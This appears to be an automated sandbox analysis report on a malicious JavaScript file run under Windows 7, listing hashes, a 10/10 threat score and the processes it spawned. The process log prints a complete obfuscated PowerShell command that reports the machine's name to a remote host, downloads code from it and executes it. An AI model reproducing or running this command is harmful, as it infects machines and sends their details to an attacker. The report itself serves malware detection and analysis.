8901142f94c9b917db4299b20aff22b24816168c9e73c993ab3e79733a3bc624

Analysis

max time kernel
1606s
max time network
1609s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
11-05-2023 01:59

Target

not009647_10_may_4238160.js
Size

387KB
MD5

9bf2fae7ad74a14ea48b8f919bd42bc0
SHA1

c20df56479606b1015c9eb7f5f46f522474a4d11
SHA256

8901142f94c9b917db4299b20aff22b24816168c9e73c993ab3e79733a3bc624
SHA512

e1d4f05087888dae7b6caca4af7f4eb301b143c693a86ce86d23cc82a50342266d3f36e212d646485e3b449fa8a5fcc2839a474630e627b8d235a5672d8c2dc8
SSDEEP

3072:IOgqsrHZMOZ9dmOts43o4WZWXQB1HFhBJsyTV3LfbBJdlNrtJ3gSQuyHNJAMTa3o:m

Score

10^/10

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	672	588	conhost.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\not009647_10_may_4238160.js
1⤵
PID:1172

C:\Windows\system32\conhost.exe
conhost --headless powershell @(1837,1844,1837,1842,1834,1843,1778,1837,1843,1779,1837,1844)|foreach{$qybtjx=$qybtjx+[char]($_-1732)};@(8036,8048,8048,8044,7990,7979,7979,8048,8037,8036,8038,8030,7978,8034,8049,8042,7979,8046,8048,7978,8044,8036,8044,7995,8037,7993)|foreach{$cnhmep=$cnhmep+[char]($_-7932)};$mpeflx='rl';$th = Invoke-RestMethod -Uri $qybtjx;new-alias ytjj cu$mpeflx;$z=$env:computername;.$([char](55856-55751)+'ex')(ytjj -useb "$cnhmep$th<>$z")
1⤵
- Process spawned unexpected child process
PID:672